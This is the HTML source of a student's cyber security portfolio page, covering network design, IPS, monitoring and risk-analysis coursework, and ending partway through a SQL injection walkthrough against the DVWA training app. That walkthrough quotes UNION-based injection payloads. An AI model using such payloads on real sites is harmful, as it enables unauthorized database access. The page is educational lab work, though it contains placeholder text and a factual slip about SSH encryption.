          <div class="col-md-4 col-sm-6 portfolio-item">
          <a class="portfolio-link" data-toggle="modal" href="#portfolioModal26">
          <div class="portfolio-hover">
          <div class="portfolio-hover-content">
          <i class="fas fa-plus fa-3x"></i>
          </div>
          </div>
          <img class="img-fluid" src="img/portfolio/minor/red/26-thumbnail.jpg" alt="">
          </a>
          <div class="portfolio-caption">
          <h4>Fontys S7</h4>
          <p class="text-muted">Security of IOT protocols and technology</p>
          </div>
          </div>
          <div class="col-md-4 col-sm-6 portfolio-item">
          <a class="portfolio-link" data-toggle="modal" href="#portfolioModal27">
          <div class="portfolio-hover">
          <div class="portfolio-hover-content">
          <i class="fas fa-plus fa-3x"></i>
          </div>
          </div>
          <img class="img-fluid" src="img/portfolio/minor/red/27-thumbnail.png" alt="">
          </a>
          <div class="portfolio-caption">
          <h4>Fontys S7</h4>
          <p class="text-muted">Pen-test at COMPANY_NAME_HERE</p>
          </div>
          </div>
          <div class="col-md-4 col-sm-6 portfolio-item">
          <a class="portfolio-link" data-toggle="modal" href="#portfolioModal28">
          <div class="portfolio-hover">
          <div class="portfolio-hover-content">
          <i class="fas fa-plus fa-3x"></i>
          </div>
          </div>
          <img class="img-fluid" src="img/portfolio/minor/red/24&28&29&30-thumbnail.png" alt="">
          </a>
          <div class="portfolio-caption">
          <h4>Fontys S7</h4>
          <p class="text-muted">Vulnerability analysis on a smartphone app</p>
          </div>
          </div>
          </div>
          <div class="row">
          <div class="col-md-4 col-sm-6 portfolio-item">
          <a class="portfolio-link" data-toggle="modal" href="#portfolioModal29">
          <div class="portfolio-hover">
          <div class="portfolio-hover-content">
          <i class="fas fa-plus fa-3x"></i>
          </div>
          </div>
          <img class="img-fluid" src="img/portfolio/minor/red/24&28&29&30-thumbnail.png" alt="">
          </a>
          <div class="portfolio-caption">
          <h4>Fontys S7</h4>
          <p class="text-muted">Vulnerability analysis on a website</p>
          </div>
          </div>
          <div class="col-md-4 col-sm-6 portfolio-item">
          <a class="portfolio-link" data-toggle="modal" href="#portfolioModal30">
          <div class="portfolio-hover">
          <div class="portfolio-hover-content">
          <i class="fas fa-plus fa-3x"></i>
          </div>
          </div>
          <img class="img-fluid" src="img/portfolio/minor/red/24&28&29&30-thumbnail.png" alt="">
          </a>
          <div class="portfolio-caption">
          <h4>Fontys S7</h4>
          <p class="text-muted">Vulnerability analysis on a device</p>
          </div>
          </div>
          <div class="col-md-4 col-sm-6 portfolio-item">
          <a class="portfolio-link" data-toggle="modal" href="#portfolioModal31">
          <div class="portfolio-hover">
          <div class="portfolio-hover-content">
          <i class="fas fa-plus fa-3x"></i>
          </div>
          </div>
          <img class="img-fluid" src="img/portfolio/minor/red/21&22&31-thumbnail.jpg" alt="">
          </a>
          <div class="portfolio-caption">
          <h4>Fontys S7</h4>
          <p class="text-muted">Organize a weekly Hack The Box event</p>
          </div>
          </div>
          </div>
          <div class="row">
          <div class="col-lg-12 text-center">
          <h5 class="section-subheading text-muted">Blue teaming specialisation</h5>
          </div>
          </div>
          <div class="row">
          <div class="col-md-4 col-sm-6 portfolio-item">
          <a class="portfolio-link" data-toggle="modal" href="#portfolioModal32">
          <div class="portfolio-hover">
          <div class="portfolio-hover-content">
          <i class="fas fa-plus fa-3x"></i>
          </div>
          </div>
          <img class="img-fluid" src="img/portfolio/minor/blue/32-thumbnail.jpg" alt="">
          </a>
          <div class="portfolio-caption">
          <h4>Fontys S7</h4>
          <p class="text-muted">Red VS Blue Event</p>
          </div>
          </div>
          <div class="col-md-4 col-sm-6 portfolio-item">
          <a class="portfolio-link" data-toggle="modal" href="#portfolioModal33">
          <div class="portfolio-hover">
          <div class="portfolio-hover-content">
          <i class="fas fa-plus fa-3x"></i>
          </div>
          </div>
          <img class="img-fluid" src="img/portfolio/minor/blue/33&37-thumbnail.png" alt="">
          </a>
          <div class="portfolio-caption">
          <h4>Fontys S7</h4>
          <p class="text-muted">IDS technologies</p>
          </div>
          </div>
          <div class="col-md-4 col-sm-6 portfolio-item">
          <a class="portfolio-link" data-toggle="modal" href="#portfolioModal34">
          <div class="portfolio-hover">
          <div class="portfolio-hover-content">
          <i class="fas fa-plus fa-3x"></i>
          </div>
          </div>
          <img class="img-fluid" src="img/portfolio/minor/blue/34-thumbnail.svg" alt="">
          </a>
          <div class="portfolio-caption">
          <h4>Fontys S7</h4>
          <p class="text-muted">Monitoring technologies</p>
          </div>
          </div>
          </div>
          <div class="row">
          <div class="col-md-4 col-sm-6 portfolio-item">
          <a class="portfolio-link" data-toggle="modal" href="#portfolioModal35">
          <div class="portfolio-hover">
          <div class="portfolio-hover-content">
          <i class="fas fa-plus fa-3x"></i>
          </div>
          </div>
          <img class="img-fluid" src="img/portfolio/minor/blue/35-thumbnail.jpg" alt="">
          </a>
          <div class="portfolio-caption">
          <h4>Fontys S7</h4>
          <p class="text-muted">SIEM technologies</p>
          </div>
          </div>
          <div class="col-md-4 col-sm-6 portfolio-item">
          <a class="portfolio-link" data-toggle="modal" href="#portfolioModal36">
          <div class="portfolio-hover">
          <div class="portfolio-hover-content">
          <i class="fas fa-plus fa-3x"></i>
          </div>
          </div>
          <img class="img-fluid" src="img/portfolio/minor/blue/36-thumbnail.jpg" alt="">
          </a>
          <div class="portfolio-caption">
          <h4>Fontys S7</h4>
          <p class="text-muted">Threat use cases</p>
          </div>
          </div>
          <div class="col-md-4 col-sm-6 portfolio-item">
          <a class="portfolio-link" data-toggle="modal" href="#portfolioModal37">
          <div class="portfolio-hover">
          <div class="portfolio-hover-content">
          <i class="fas fa-plus fa-3x"></i>
          </div>
          </div>
          <img class="img-fluid" src="img/portfolio/minor/blue/33&37-thumbnail.png" alt="">
          </a>
          <div class="portfolio-caption">
          <h4>Fontys S7</h4>
          <p class="text-muted">Developing and tuning an IDS</p>
          </div>
          </div>
          </div>
          <div class="row">
          <div class="col-md-4 col-sm-6 portfolio-item">
          <a class="portfolio-link" data-toggle="modal" href="#portfolioModal38">
          <div class="portfolio-hover">
          <div class="portfolio-hover-content">
          <i class="fas fa-plus fa-3x"></i>
          </div>
          </div>
           <img class="img-fluid" src="img/portfolio/minor/blue/38-thumbnail.png" alt="">
          </a>
          <div class="portfolio-caption">
          <h4>Fontys S7</h4>
          <p class="text-muted">Setting up a SOC</p>
          </div>
          </div>
          <div class="col-md-4 col-sm-6 portfolio-item">
          <a class="portfolio-link" data-toggle="modal" href="#portfolioModal39">
          <div class="portfolio-hover">
          <div class="portfolio-hover-content">
          <i class="fas fa-plus fa-3x"></i>
          </div>
          </div>
          <img class="img-fluid" src="img/portfolio/minor/blue/39-thumbnail.jpg" alt="">
          </a>
          <div class="portfolio-caption">
          <h4>Fontys S7</h4>
          <p class="text-muted">Vulnerability scanning</p>
          </div>
          </div>
          <div class="col-md-4 col-sm-6 portfolio-item">
          <a class="portfolio-link" data-toggle="modal" href="#portfolioModal40">
          <div class="portfolio-hover">
          <div class="portfolio-hover-content">
          <i class="fas fa-plus fa-3x"></i>
          </div>
          </div>
          <img class="img-fluid" src="img/portfolio/minor/blue/40-thumbnail.png" alt="">
          </a>
          <div class="portfolio-caption">
          <h4>Fontys S7</h4>
          <p class="text-muted">Security monitoring, analysis and triage</p>
          </div>
          </div>
          </div>
          <div class="row">
          <div class="col-lg-12 text-center">
          <h5 class="section-subheading text-muted">Forensics specialisation</h5>
          </div>
          </div>
          </div>
          </section>
          
          <section id="about">
          <div class="container">
          <div class="row">
          <div class="col-lg-12 text-center">
          <h2 class="section-heading text-uppercase">About</h2>
          <h3 class="section-subheading text-muted">My cyber security career.</h3>
          </div>
          </div>
          <div class="row">
          <div class="col-lg-12">
          <ul class="timeline">
          <li>
          <div class="timeline-image">
          <img class="rounded-circle img-fluid" src="img/about/1.jpg" alt="">
          </div>
          <div class="timeline-panel">
          <div class="timeline-heading">
          <h4>Fontys S3 2019</h4>
          <h4 class="subheading">The beginning</h4>
          </div>
          <div class="timeline-body">
          <p class="text-muted">This was the first time I got experienced the cyber security stream and what it had to offer. I learned the basics of the defensive side of cyber security.</p>
          </div>
          </div>
          </li>
          <li class="timeline-inverted">
          <div class="timeline-image">
          <img class="rounded-circle img-fluid" src="img/about/2.jpg" alt="">
          </div>
          <div class="timeline-panel">
          <div class="timeline-heading">
          <h4>Fontys S4 2020</h4>
          <h4 class="subheading">Round 2</h4>
          </div>
          <div class="timeline-body">
          <p class="text-muted">This was my second semester on cyber security this time focusing on the offensive side.</p>
          </div>
          </div>
          </li>
          <li>
          <div class="timeline-image">
          <img class="rounded-circle img-fluid" src="img/about/3.png" alt="">
          </div>
          <div class="timeline-panel">
          <div class="timeline-heading">
          <h4>Fontys S5 2021</h4>
          <h4 class="subheading">The internship</h4>
          </div>
          <div class="timeline-body">
          <p class="text-muted">Lorem ipsum dolor sit amet, consectetur adipisicing elit. Sunt ut voluptatum eius sapiente, totam reiciendis temporibus qui quibusdam, recusandae sit vero unde, sed, incidunt et ea quo dolore laudantium consectetur!</p>
          </div>
          </div>
          </li>
          <li class="timeline-inverted">
          <div class="timeline-image">
          <img class="rounded-circle img-fluid" src="img/about/4.jpg" alt="">
          </div>
          <div class="timeline-panel">
          <div class="timeline-heading">
          <h4>Fontys S7 2021</h4>
          <h4 class="subheading">My minor</h4>
          </div>
          <div class="timeline-body">
          <p class="text-muted">Lorem ipsum dolor sit amet, consectetur adipisicing elit. Sunt ut voluptatum eius sapiente, totam reiciendis temporibus qui quibusdam, recusandae sit vero unde, sed, incidunt et ea quo dolore laudantium consectetur!</p>
          </div>
          </div>
          </li>
          
          <li class="timeline-inverted">
          <div class="timeline-image">
          <h4>The
          <br>Future
          </h4>
          </div>
          </li>
          </ul>
          </div>
          </div>
          </div>
          </section>
          
          <section class="bg-light" id="team">
          <div class="container">
          <div class="row">
          <div class="col-lg-12 text-center">
          <h2 class="section-heading text-uppercase">About me</h2>
          <h3 class="section-subheading text-muted">Some additional links and information.</h3>
          </div>
          </div>
          <div class="row">
          <div class="col-sm-4">
          
          </div>
          <div class="col-sm-4">
          <div class="team-member">
          <img class="mx-auto rounded-circle" src="img/team/Pim.jpg" alt="">
          <h4>Pim Beekmans</h4>
          <p class="text-muted">Student</p>
          <ul class="list-inline social-buttons">
          <li class="list-inline-item">
          <a href="#">
          <i class="fab fa-twitter"></i>
          </a>
          </li>
          <li class="list-inline-item">
           <a href="#">
          <i class="fab fa-facebook-f"></i>
          </a>
          </li>
          <li class="list-inline-item">
          <a href="https://www.linkedin.com/in/pim-beekmans/?originalSubdomain=nl">
          <i class="fab fa-linkedin-in"></i>
          </a>
          </li>
          </ul>
          </div>
          </div>
          <div class="col-sm-4">
          
          </div>
          <div class="row">
          <div class="col-lg-8 mx-auto text-center">
          <p class="large text-muted">This is me, thank you for reading, hopefully you've liked my portfolio on cyber security. For additional feedback feel free to send an email to <a href="/cdn-cgi/l/email-protection#ddadb4b09dbfb8b8b6b0bcb3aef3b9b8ab"><span class="__cf_email__" data-cfemail="1a6a73775a787f7f71777b7469347e7f6c">[email&#160;protected]</span></a>.</p>
          </div>
          </div>
          </div>
          </div>
          </section>
          
          <section class="py-5">
          <div class="container">
          <div class="row">
          
          </div>
          </div>
          </section>
          
          <section id="contact">
          <div class="container">
          <div class="row">
          <div class="col-lg-12 text-center">
          <h2 class="section-heading text-uppercase">Contact Me</h2>
          <br>
          </div>
          </div>
          <div class="row">
          <div class="col-lg-12">
          <form id="contactForm" name="sentMessage" novalidate="novalidate">
          <div class="row">
          <div class="col-md-6">
          <div class="form-group">
          <input class="form-control" id="name" type="text" placeholder="Your Name *" required="required" data-validation-required-message="Please enter your name.">
          <p class="help-block text-danger"></p>
          </div>
          <div class="form-group">
          <input class="form-control" id="email" type="email" placeholder="Your Email *" required="required" data-validation-required-message="Please enter your email address.">
          <p class="help-block text-danger"></p>
          </div>
          <div class="form-group">
          <input class="form-control" id="phone" type="tel" placeholder="Your Phone *" required="required" data-validation-required-message="Please enter your phone number.">
          <p class="help-block text-danger"></p>
          </div>
          </div>
          <div class="col-md-6">
          <div class="form-group">
          <textarea class="form-control" id="message" placeholder="Your Message *" required="required" data-validation-required-message="Please enter a message."></textarea>
          <p class="help-block text-danger"></p>
          </div>
          </div>
          <div class="clearfix"></div>
          <div class="col-lg-12 text-center">
          <div id="success"></div>
          <button id="sendMessageButton" class="btn btn-primary btn-xl text-uppercase" type="submit">Send Message</button>
          </div>
          </div>
          </form>
          </div>
          </div>
          </div>
          </section>
          
          <footer>
          <div class="container">
          <div class="row">
          <div class="col-md-4">
          <span class="copyright">Copyright &copy; Beekmans.dev 2019</span>
          </div>
          <div class="col-md-4">
          
          </div>
          <div class="col-md-4">
          <ul class="list-inline quicklinks">
          <li class="list-inline-item">
          <a href="#">Privacy Policy</a>
          </li>
          <li class="list-inline-item">
          <a href="#">Terms of Use</a>
          </li>
          </ul>
          </div>
          </div>
          </div>
          </footer>
          
          
          <div class="portfolio-modal modal fade" id="portfolioModal1" tabindex="-1" role="dialog" aria-hidden="true">
          <div class="modal-dialog">
          <div class="modal-content">
          <div class="close-modal" data-dismiss="modal">
          <div class="lr">
          <div class="rl"></div>
          </div>
          </div>
          <div class="container">
          <div class="row">
          <div class="col-lg-8 mx-auto">
          <div class="modal-body">
          
          <h2 class="text-uppercase">Self Assessment</h2>
          <p class="item-intro text-muted">Week 1</p>
          <p>
          <ol>
          <li>What did you like / or find easy?</li>
          <li>What did you find difficult? At what point did it get too difficult for now?</li>
          <li>
          Then check the list of learning subjects for the basic knowledge assignment and
          possibilities and requirements for the project.
          <ul>
          <li>What subjects do you already know and what is unknown terrain for you?</li>
          </ul>
          </li>
          <li>What parts of the current semester would you like to give much attention?</li>
          <li>What do you want to achieve and learn in particular?</li>
          <li>Which study style and corresponding planning is most suitable for you?</li>
          <li>What would you like to do or achieve in the project? (subjects, type of project,
          domain to work in, learning goals, etc.)
          </li>
          </ol>
          <br>
          Answers:
          <br>
           <ol>
          <li>I like working with servers and playing with my network at home and virtual
          machines. I think I find basic networking the easiest.
          </li>
          <li>Advanced networking all knowledge that I know is self-taught so I think there is a
          lot I don’t know yet. I got stuck on virtual lans and ip routing at home what else
          I’ll find difficult is what I need to find out in the distant future.
          </li>
          <li>
          Subjects:
          <div class="container">
          <div class="row">
          <div class="col-sm-4">
          <ul>
          Used:
          <li>VMWare</li>
          <li>Linux</li>
          <li>IPv4</li>
          <li>NAT</li>
          <li>TCP/IP</li>
          <li>DNS</li>
          <li>HTTP</li>
          <li>FTP</li>
          <li>Firewalls</li>
          <li>HTTPS</li>
          <li>VPN</li>
          </ul>
          </div>
          <div class="col-sm-4">
          <ul>
          Know about but never used:
          <li>VMWare ESX</li>
          <li>Wireshark</li>
          <li>ARP</li>
          <li>IP routing</li>
          <li>SMTP</li>
          <li>IDS</li>
          </ul>
          </div>
          <div class="col-sm-4">
          <ul>
          Never heard about it:
          <li>Seclab</li>
          <li>ICMP ping</li>
          <li>CIA and IT Risk analysis</li>
          </ul>
          </div>
          </div>
          </div>
          </li>
          <li>Advanced networking and the transition to Java.</li>
          <li>How to be a good Cyber security expert.</li>
          <li>Style 2, I’ll try to find out if this is the most suitable for me and maybe go to
          the style 3 courses on the days I get subjects I already know.
          </li>
          <li>I don’t really have a preference I want to learn as much as possible related to
          cyber security.
          </li>
          </ol>
          </p>
          <ul class="list-inline">
          <li>Date: February 2019</li>
           <li>Client: Fontys</li>
          <li>Category: Self assessment</li>
          </ul>
          <button class="btn btn-primary" data-dismiss="modal" type="button">
          <i class="fas fa-times"></i>
          Close Project
          </button>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          
          <div class="portfolio-modal modal fade" id="portfolioModal2" tabindex="-1" role="dialog" aria-hidden="true">
          <div class="modal-dialog">
          <div class="modal-content">
          <div class="close-modal" data-dismiss="modal">
          <div class="lr">
          <div class="rl"></div>
          </div>
          </div>
          <div class="container">
          <div class="row">
          <div class="col-lg-8 mx-auto">
          <div class="modal-body">
          
          <h2 class="text-uppercase">Fontys S3</h2>
          <p class="item-intro text-muted">Network diagram</p>
          <img class="img-fluid d-block mx-auto" src="../../img/portfolio/blue/NetworkDiagram.png" alt="">
          <p>This network diagram shows 3 main VLAN's containing a employee environment for the
          employees to work on, a guest environment for the people visiting the company as guests
          and a DMZ for the servers and services to the outside world.</p>
          <ul class="list-inline">
          <li>Date: February 2019</li>
          <li>Client: Fontys</li>
          <li>Category: Documentation</li>
          </ul>
          <button class="btn btn-primary" data-dismiss="modal" type="button">
          <i class="fas fa-times"></i>
          Close Project
          </button>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          
          <div class="portfolio-modal modal fade" id="portfolioModal3" tabindex="-1" role="dialog" aria-hidden="true">
          <div class="modal-dialog">
          <div class="modal-content">
          <div class="close-modal" data-dismiss="modal">
          <div class="lr">
          <div class="rl"></div>
          </div>
          </div>
          <div class="container">
          <div class="row">
          <div class="col-lg-8 mx-auto">
          <div class="modal-body">
          
          <h2 class="text-uppercase">Fontys S3</h2>
          <p class="item-intro text-muted">Network diagram V2</p>
          <img class="img-fluid d-block mx-auto" src="../../img/portfolio/blue/NetworkDiagramV2.png" alt="">
          <p>This is the second version of my network diagram. I changed a few things to match
          Casper's feedback. The first thing I changed are the firewalls, I only needed to address
          the physical firewall and not the ones for every single interface. The last thing was I
          added the corresponding IP ranges and subnets to each VLAN.</p>
          <ul class="list-inline">
          <li>Date: March 2019</li>
          <li>Client: Fontys</li>
          <li>Category: Documentation</li>
          </ul>
          <button class="btn btn-primary" data-dismiss="modal" type="button">
          <i class="fas fa-times"></i>
          Close Project
          </button>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          
          <div class="portfolio-modal modal fade" id="portfolioModal4" tabindex="-1" role="dialog" aria-hidden="true">
          <div class="modal-dialog">
          <div class="modal-content">
          <div class="close-modal" data-dismiss="modal">
          <div class="lr">
          <div class="rl"></div>
          </div>
          </div>
          <div class="container">
          <div class="row">
          <div class="col-lg-8 mx-auto">
          <div class="modal-body">
          
          <h2 class="text-uppercase">Fontys S3</h2>
          <p class="item-intro text-muted">Secure connections</p>
          <a href="../../img/portfolio/blue/sshAccess.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/blue/sshAccess.png" alt=""></a>
          <p>Here you can see that I made a SSH connection to my Ubuntu webserver. I use Putty as my
          SSH terminal. SSH is encrypted using PGP (Pretty good privacy) which uses a public and a
          private key to communicate with each other. This is especially helpful because you don't
          need to transfer passwords to encrypt the connection. The sending client encrypts its
          message using the public key from the recipient and the recipient decrypts the message
          using its own private key. This works the same the other way around. I can use this
          technique to remotely manage my webservers without the need physical access.</p>
          <a href="../../img/portfolio/blue/vpnAccess.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/blue/vpnAccess.png" alt=""></a>
          <p>Here you can see that I'm connected to a VPN. This VPN is OpenVPN and runs on the PfSense
          router. It gives me access to the subnets I gave it access to and with this I can
          remotely manage my whole network, with being actually physically connected to the
          network. The OpenVPN connection is encrypted be TLS (Transfer layer security) which is
          successor from SSL. TLS uses a handshake at the start of the connection where a key is
          shared between the 2 clients. This key will be used for the symmetric encryption of the
          messages. The authenticity of the connection is secured by a certificate and the public
          key of the webserver this prevents possible man in the middle attacks, where someone
          will pretend to be another website for example.</p>
          <a href="../../img/portfolio/blue/sslConnection.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/blue/sslConnection.png" alt=""></a>
          <p>Here you can see the ssl certificate I created for the website that is running my
          portfolio. I created the script using certbot in Ubuntu and the CA is Let's encrypt
          authority x3. The website automatically forces all traffic to https, the website is
          still accessible by http but will redirect the user to https.</p>
          <ul class="list-inline">
          <li>Date: March 2019</li>
          <li>Client: Fontys</li>
          <li>Category: Secure connections</li>
          </ul>
          <button class="btn btn-primary" data-dismiss="modal" type="button">
          <i class="fas fa-times"></i>
          Close Project
          </button>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          
          <div class="portfolio-modal modal fade" id="portfolioModal5" tabindex="-1" role="dialog" aria-hidden="true">
          <div class="modal-dialog">
          <div class="modal-content">
          <div class="close-modal" data-dismiss="modal">
          <div class="lr">
          <div class="rl"></div>
          </div>
          </div>
          <div class="container">
          <div class="row">
          <div class="col-lg-8 mx-auto">
          <div class="modal-body">
          
          <h2 class="text-uppercase">Fontys S3</h2>
          <p class="item-intro text-muted">IDS/IPS</p>
          <P>I implemented Suricata as my IPS, I thought it would be the best option because they say
          it's more advanced and newer. Below you can see some prove of the implementation and
          some results I came across.</P>
          <a href="../../img/portfolio/blue/Suricata1.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/blue/Suricata1.png" alt=""></a>
          <p>I configured the IPS to monitor the WAN and LAN interface for now but I'm planning to
          configure it to the Employee VLAN as well. This will protect the company for any
          potential threats from the inside.</p>
          <a href="../../img/portfolio/blue/Suricata2.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/blue/Suricata2.png" alt=""></a>
          <p>I tested the IPS with a website called <a href="https://www.wicar.org/">Wicar</a>. On
          this website you can run malicious code and test you network without it being an actual
          threat or risk.</p>
          <a href="../../img/portfolio/blue/Suricata3.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/blue/Suricata3.png" alt=""></a>
          <p>I have used the Snort community rules and the Emerging threats rules these are both free
          to use and do a decent job of protecting the network with not too many false
          positives.</p>
          <a href="../../img/portfolio/blue/DDOSAlert.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/blue/DDOSAlert.png" alt=""></a>
          <p>We encountered a real world scenario which actually turned out to work really well with
          an IPS. Bram tried to DDOS my website while it was running in my pfsense environment.
          The IPS immediately noticed this and blocked his IP. While the website was running
          outside the pfsense zone Bram could DDOS all he want without getting blocked.</p>
          <a href="../../img/portfolio/blue/BlockList.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/blue/BlockList.png" alt=""></a>
          <p>Here you can see Bram's IP in the Suricata blocklist.</p>
          <a href="../../img/portfolio/blue/Bram'sIP.jpg"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/blue/Bram'sIP.jpg" alt=""></a>
          <p>This is a screenshot from Bram's computer with his IP he used for generating the
          alert.</p>
          <ul class="list-inline">
          <li>Date: April 2019</li>
          <li>Client: Fontys</li>
          <li>Category: IDS/IPS</li>
          </ul>
          <button class="btn btn-primary" data-dismiss="modal" type="button">
          <i class="fas fa-times"></i>
          Close Project
          </button>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          
          <div class="portfolio-modal modal fade" id="portfolioModal6" tabindex="-1" role="dialog" aria-hidden="true">
          <div class="modal-dialog">
          <div class="modal-content">
          <div class="close-modal" data-dismiss="modal">
          <div class="lr">
          <div class="rl"></div>
          </div>
          </div>
          <div class="container">
          <div class="row">
          <div class="col-lg-8 mx-auto">
          <div class="modal-body">
          
          <h2 class="text-uppercase">Fontys S3</h2>
          <p class="item-intro text-muted">Information Security and Risk Analysis</p>
          <h3>CIA</h3>
          <h4>Confidentiality:</h4>
          <p>The company will hold confidential data from costumers, things like credit card
          information user accounts and databases for the costumer's websites.</p>
          <br>
          <ul>
          <li>Attribute .... Threat</li>
          <li>Costumer data .... Leak</li>
          </ul>
          <h4>Integrity:</h4>
          <p>The costumers trust the company to secure their servers on their end and they trust the
          company that it won't sell any costumer data to 3rd parties.</p>
          <br>
          <ul>
          <li>Attribute .... Threat</li>
          <li>Correct .... Tampering</li>
          </ul>
          <h4>Availability:</h4>
          <p>Because the costumers might use these websites for commercial use, it is at the utmost
          importance that the websites are fast, reliable and 24/7 reachable.</p>
          <br>
          <ul>
          <li>Attribute .... Threat</li>
           <li>Well timed .... Delay</li>
          <li>Continuity .... Downtime</li>
          </ul>
          <p>Click on this <a href="../../img/portfolio/Risk%20analysis.xlsx">link</a> to download the full
          risk analysis.</p>
          <ul class="list-inline">
          <li>Date: April 2019</li>
          <li>Client: Fontys</li>
          <li>Category: Risk Analysis</li>
          </ul>
          <button class="btn btn-primary" data-dismiss="modal" type="button">
          <i class="fas fa-times"></i>
          Close Project
          </button>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          
          <div class="portfolio-modal modal fade" id="portfolioModal7" tabindex="-1" role="dialog" aria-hidden="true">
          <div class="modal-dialog">
          <div class="modal-content">
          <div class="close-modal" data-dismiss="modal">
          <div class="lr">
          <div class="rl"></div>
          </div>
          </div>
          <div class="container">
          <div class="row">
          <div class="col-lg-8 mx-auto">
          <div class="modal-body">
          
          <h2 class="text-uppercase">Fontys S3</h2>
          <p class="item-intro text-muted">IT Monitoring</p>
          <p>I implemented a Nagios server and installed Ntop as part of my network monitoring
          system.</p>
          <a href="../../img/portfolio/blue/OnlineHosts.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/blue/OnlineHosts.png" alt=""></a>
          <p>Ntop generates a list with all hosts that are online on the network and you can filter
          them by VLAN. You can see how much bandwidth they are using how much data was
          transferred since they are online and how many flows are going to that host.</p>
          <a href="../../img/portfolio/blue/MostUsedHosts.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/blue/MostUsedHosts.png" alt=""></a>
          <p>Here I can see which host uses the most traffic in my DMZ. With 172.16.0.2 being the
          apache server and 172.16.0.3 being the IIS server.</p>
          <a href="../../img/portfolio/blue/MostUsedProtocols.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/blue/MostUsedProtocols.png" alt=""></a>
          <p>Here I can see which protocols are used the most. Windows update on number 1 because it
          needs to download a lot and after that ssl for the https traffic to my website and ftp
          to push changes. This doesn't indicate that the most traffic is going to windows update
          only that it used the most bandwidth.</p>
          <a href="../../img/portfolio/blue/BulgarianHacker.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/blue/BulgarianHacker.png" alt=""></a>
          <p>Ntop even managed to identify a rogue Bulgarian hacker trying to access my Jenkins
          server.</p>
          <a href="../../img/portfolio/blue/HostsStatus.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/blue/HostsStatus.png" alt=""></a>
          <p>This is Nagios it is in some ways similar to Ntop but is much more advanced and can do
          some things that Ntop can't. On this page you can see al the hosts that are monitored by
          Nagios. It displays if the hosts are up and running or if there are any problems.</p>
          <a href="../../img/portfolio/blue/HostDetails.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/blue/HostDetails.png" alt=""></a>
          <p>If you click on one of the monitored hosts from the previous picture Nagios will show you
          with a more detailed report on the host with some more information about uptime and
          status.</p>
          <a href="../../img/portfolio/blue/ServiceStatus.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/blue/ServiceStatus.png" alt=""></a>
          <p>This is a great example on something Nagios is much better at then Ntop. Here Nagios
          monitors all the services you flagged on different hosts. For example your apache server
          could be down but the physical Linux server is still up and running. Nagios and Ntop
          will both say this Linux machine is up and fine but Nagios will also say that the
          http/https service is down. The same goes for every other service you configure to
          monitor (SSH/FTP).</p>
          <ul class="list-inline">
          <li>Date: April 2019</li>
          <li>Client: Fontys</li>
          <li>Category: Monitoring</li>
          </ul>
          <button class="btn btn-primary" data-dismiss="modal" type="button">
          <i class="fas fa-times"></i>
          Close Project
          </button>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          
          <div class="portfolio-modal modal fade" id="portfolioModal8" tabindex="-1" role="dialog" aria-hidden="true">
          <div class="modal-dialog">
          <div class="modal-content">
          <div class="close-modal" data-dismiss="modal">
          <div class="lr">
          <div class="rl"></div>
          </div>
          </div>
          <div class="container">
          <div class="row">
          <div class="col-lg-8 mx-auto">
          <div class="modal-body">
          
          <h2 class="text-uppercase">Fontys S4</h2>
          <p class="item-intro text-muted">SQL injection</p>
          <a href="../../img/portfolio/red/SqlStart.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/SqlStart.png" alt=""></a>
          <p>I applied sql injection on a search function in DVWA.</p>
           <a href="../../img/portfolio/red/CheckIfVuln.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/CheckIfVuln.png" alt=""></a>
          <p>The easiest way to check if the search function is vulnerable is to just type some
          gibberish that the search function doesn't expect. This should generate a sql error.</p>
          <a href="../../img/portfolio/red/CheckIfVulnResult.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/CheckIfVulnResult.png" alt=""></a>
          <p>And it did! Now we know that the search function is vulnerable and we can try some
          injections</p>
          <p>So know we can check which database we're dealing with by getting the version.</p>
          <a href="../../img/portfolio/red/GetDbVersion.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/GetDbVersion.png" alt=""></a>
          <p>Oke let's break it down.</p>
          <p>The query that is used for searching the users probably looks like something like this
          "SELECT first_name, last_name FROM users WHERE user_id = '$id'" and I typed "null' UNION
          select CURRENT_user, @@version #"</p>
          <p>The "null'" ends the original query and makes it obsolete because there probably aren't
          any users with a 'null' as id. The 'UNION' allows me to execute a subquery and the
          result from this query gets added underneath the results from the original query.</p>
          <p>Now I use 'select' to indicate which information I want to get. I used 'CURRENT_user' and
          '@@version' to get both the current user and the database version.</p>
          <p>The reason that I select both the "CURRENT_user" and the "@@version" in the same query,
          is that if I would only select for example "@@version" I would get the error displayed
          below. I could have fixed that by rewriting the query like this: "INSERT QUERY" and I
          typed "null' UNION select @@version, @@version #" This way the subquery matches the
          amount of columns of the original query again.</p>
          <a href="../../img/portfolio/Use%20Of%23.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/Use%20Of%23.png" alt=""></a>
          <p>TALK ABOUT THE #</p>
          <a href="../../img/portfolio/red/DiffNumberColumns.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/DiffNumberColumns.png" alt=""></a>
          <p>Now we can execute any query we want as long as it matches the amount of columns of the
          original query, otherwise we get a error like the one displayed above. Now we can try
          something that has a little more impact.</p>
